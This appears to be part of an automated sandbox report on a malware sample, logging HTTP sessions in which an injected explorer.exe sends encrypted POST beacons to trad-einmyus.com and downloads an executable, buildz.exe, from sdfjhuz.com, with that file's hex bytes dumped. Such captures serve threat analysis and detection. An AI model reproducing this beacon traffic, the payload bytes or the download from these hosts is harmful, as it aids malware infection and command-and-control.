3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49714	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:52.008408070 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jshvqxnxlgx.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 195 Host: trad-einmyus.com
Apr 4, 2024 17:48:52.008436918 CEST	195	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 2d a3 bc 69 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d-i \dvY3E[:H`1mdh&!XV+,=RcyZz.#%f(>'cl<Uju5,iU4:iqc
Apr 4, 2024 17:48:52.298906088 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49715	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:52.580955029 CEST	285	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qxjqslomabchbuh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 282 Host: trad-einmyus.com
Apr 4, 2024 17:48:52.580965042 CEST	282	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 0f bc 87 28 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d(CLx:a1\Jp.T-Ha 8*ocUNyn"p:XL&D@[4,!{#P?{?K}Uax5\|x9[QV$&2CR.:
Apr 4, 2024 17:48:52.874041080 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49716	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:53.159481049 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wihgequinwr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: trad-einmyus.com
Apr 4, 2024 17:48:53.159562111 CEST	255	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 2d c8 9a 11 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d-]*0MEtm;c"lSW9i+\<;\|?-M6ZYU%(2$DHUc!<;+sj!]lA_Mv[jnbClfH`v
Apr 4, 2024 17:48:53.456214905 CEST	227	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49717	190.249.187.165	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:53.820676088 CEST	162	OUT	GET /dl/buildz.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: sdfjhuz.com
Apr 4, 2024 17:48:54.571254969 CEST	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Apr 2024 15:48:54 GMT Content-Type: application/octet-stream Content-Length: 734208 Last-Modified: Thu, 04 Apr 2024 15:40:02 GMT Connection: close ETag: "660ec9d2-b3400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e4 ff e6 f3 a0 9e 88 a0 a0 9e 88 a0 a0 9e 88 a0 cf e8 16 a0 b0 9e 88 a0 cf e8 22 a0 ff 9e 88 a0 cf e8 23 a0 84 9e 88 a0 a9 e6 1b a0 a5 9e 88 a0 a0 9e 89 a0 c7 9e 88 a0 cf e8 27 a0 a1 9e 88 a0 cf e8 12 a0 a1 9e 88 a0 cf e8 15 a0 a1 9e 88 a0 52 69 63 68 a0 9e 88 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 03 c7 33 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 b0 00 00 00 6c 7d 02 00 00 00 00 bf 22 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 7d 02 00 04 00 00 81 bc 0b 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 76 0a 00 3c 00 00 00 00 20 7d 02 88 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 6d 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d8 af 00 00 00 10 00 00 00 b0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 16 bf 09 00 00 c0 00 00 00 c0 09 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 99 72 02 00 80 0a 00 00 28 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 96 00 00 00 20 7d 02 00 98 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$"#'RichPEL3dl}"@}v< }m@\|.text `.rdata@@.datar(t@.rsrc }@@
Apr 4, 2024 17:48:54.571307898 CEST	1286	IN	Data Raw: c7 01 38 c2 40 00 e9 a9 07 00 00 cc cc cc cc cc 56 8b f1 c7 06 38 c2 40 00 e8 96 07 00 00 f6 44 24 08 01 74 09 56 e8 74 0c 00 00 83 c4 04 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 83 7e 14 08 72 0b 8b 06 50 e8 51 0c 00 00 83 c4 04 33 Data Ascii: 8@V8@D$tVt^~rPQ3FFfSUl$Vs;shmJ+;s;u.3^][%tM9Cr9Gr6SiQPswr
Apr 4, 2024 17:48:54.571324110 CEST	252	IN	Data Raw: 8b f1 e8 d9 02 00 00 c7 06 38 c2 40 00 8b c6 5e c2 04 00 e9 96 02 00 00 e9 91 02 00 00 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 b3 02 00 00 c7 06 c4 c1 40 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 83 ec 0c 8b 45 08 89 45 08 8d 45 08 50 8d 4d f4 e8 fe 01 Data Ascii: 8@^UVu@^]UEEEPMhpJEPE@ZUVuf@^]UEEEPMhpJEPE@UVu@^]UVEtVY^]
Apr 4, 2024 17:48:54.571609974 CEST	1286	IN	Data Raw: f1 e8 ac 01 00 00 f6 45 08 01 74 07 56 e8 8b 06 00 00 59 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 56 8b f1 e8 8b 01 00 00 f6 45 08 01 74 07 56 e8 6a 06 00 00 59 8b c6 5e 5d c2 04 00 3b 0d 7c 80 4a 00 75 02 f3 c3 e9 c9 0c 00 00 8b ff 55 8b ec 83 ec 20 Data Ascii: EtVY^]UVEtVjY^];\|JuU SW3j3Y}]9]uiME;tVEEEPSuEPEEBMxEEPSTYY^_[UM@H@]Au
Apr 4, 2024 17:48:54.571621895 CEST	126	IN	Data Raw: 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 1c 1b 40 00 8b ff 2c 1b 40 00 34 1b 40 00 44 1b 40 00 58 1b 40 00 8b 45 08 5e 5f c9 c3 90 8a 46 03 88 47 03 8b 45 08 5e 5f c9 c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8a 46 Data Ascii: $@,@4@D@X@E^_FGE^_IFGFGE^_FGFGFGE^_US]woVW=J
Apr 4, 2024 17:48:54.743307114 CEST	1286	IN	Data Raw: 00 00 75 18 e8 fe 1c 00 00 6a 1e e8 48 1b 00 00 68 ff 00 00 00 e8 49 02 00 00 59 59 85 db 74 04 8b c3 eb 03 33 c0 40 50 6a 00 ff 35 80 a7 4a 00 ff 15 88 c0 40 00 8b f8 85 ff 75 26 6a 0c 5e 39 05 88 a7 4a 00 74 0d 53 e8 20 1d 00 00 59 85 c0 75 a9 Data Ascii: ujHhIYYt3@Pj5J@u&j^9JtS YuV0O0_^SY;3[]jh(qJ339u;u8PVYYuuuuPUEEEPj
Apr 4, 2024 17:48:54.743366003 CEST	1286	IN	Data Raw: ff 55 8b ec e8 f8 17 00 00 ff 75 08 e8 41 16 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 8b ff 55 8b ec 83 ec 10 eb 0d ff 75 08 e8 38 18 00 00 59 85 c0 74 0f ff 75 08 e8 a9 fa ff ff 59 85 c0 74 e6 c9 c3 f6 05 20 9e 4a 00 01 bf 14 9e 4a 00 be 38 c2 Data Ascii: UuAYhUu8YtuYt JJ8@u, JjEPE@@h@5J9YWMhtJEPuU=,JuQuhYY]jXhhqJrEP@395uVVjV@M
Apr 4, 2024 17:48:54.743380070 CEST	1286	IN	Data Raw: e8 46 31 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d 78 8d 4a 00 74 12 8b 0d 30 8b 4a 00 85 48 70 75 07 e8 86 52 00 00 89 06 8b 46 04 3b 05 38 8a 4a 00 74 16 8b 46 08 8b 0d 30 8b 4a 00 85 48 70 75 08 e8 e5 4a 00 00 89 46 04 8b 46 Data Ascii: F1FHlHhN;xJt0JHpuRF;8JtF0JHpuJFF@puHpF@F^]A@tyt$IxQPYYuUQSVG@EtuJ (EKE>u8
Apr 4, 2024 17:48:54.743393898 CEST	1286	IN	Data Raw: 00 00 0f 84 80 00 00 00 83 e8 41 74 10 48 48 74 58 48 48 74 08 48 48 0f 85 8c 05 00 00 80 c2 20 c7 85 94 fd ff ff 01 00 00 00 88 95 ef fd ff ff 83 8d f0 fd ff ff 40 8d bd f4 fd ff ff b8 00 02 00 00 89 bd e4 fd ff ff 89 85 9c fd ff ff 39 b5 e8 fd Data Ascii: AtHHtXHHtHH @9H00uu[;uJy
Apr 4, 2024 17:48:54.743467093 CEST	1286	IN	Data Raw: 57 e8 2c 4c 00 00 83 c1 30 89 9d 9c fd ff ff 8b f8 8b da 83 f9 39 7e 06 03 8d b8 fd ff ff 88 0e 4e eb bd 8d 45 f3 2b c6 46 f7 85 f0 fd ff ff 00 02 00 00 89 85 e0 fd ff ff 89 b5 e4 fd ff ff 74 62 85 c0 74 07 8b ce 80 39 30 74 57 ff 8d e4 fd ff ff Data Ascii: W,L09~NE+Ftbt90tW0@?If90t;u+(;uJI8t@;u+}@t2t-t+t +
Apr 4, 2024 17:48:54.743563890 CEST	1286	IN	Data Raw: eb 33 8b 45 10 85 c0 75 04 88 02 eb e2 8b f2 2b f0 8a 08 88 0c 06 40 84 c9 74 03 4f 75 f3 85 ff 75 11 c6 02 00 e8 67 ff ff ff 6a 22 59 89 08 8b f1 eb c6 33 c0 5f 5e 5d c3 cc cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 Data Ascii: 3Eu+@tOuugj"Y3_^]L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U}t-uj5J@uV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49718	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:57.003393888 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cuefhssjycse.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: trad-einmyus.com
Apr 4, 2024 17:48:57.003412962 CEST	149	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 9b 66 5d 02 c9 a1 c1 64 3c 93 dc 61 Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d<aZDkft\[cEdtr%18FY^;?uq:6NdTKJ
Apr 4, 2024 17:48:57.314788103 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49719	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:57.606947899 CEST	284	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wdoppvcdtixmex.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: trad-einmyus.com
Apr 4, 2024 17:48:57.606967926 CEST	352	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 1f d7 ac 2e Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d.p4MLU{O[\|2tnOMy^B/{l>^8KS:&uD.U1,O;KzyY%7e.+zIdF>pA^}]M.k#WM]"(g)gy+O
Apr 4, 2024 17:48:57.905314922 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49720	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:58.190802097 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gsjmasrkkjrldiqo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: trad-einmyus.com
Apr 4, 2024 17:48:58.190817118 CEST	271	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 2b b8 99 0e Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]d+3x-m-aw\d^n5d#NC9zvz1+OI>zMS0wA@h4$wzJ=kfp,$r<0L%Ecw[ESyG*f5/
Apr 4, 2024 17:48:58.538686991 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:48:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49721	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:48:58.821523905 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://srlstapgnwbh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: trad-einmyus.com
Apr 4, 2024 17:48:58.821523905 CEST	223	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 58 ac d5 7f Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dX>Y>HI(+zl!Jm:}~9Rg<Ek=N_!z)[?>RZNNhig*&fS9~/O<^KMRRbCMmmaM?g
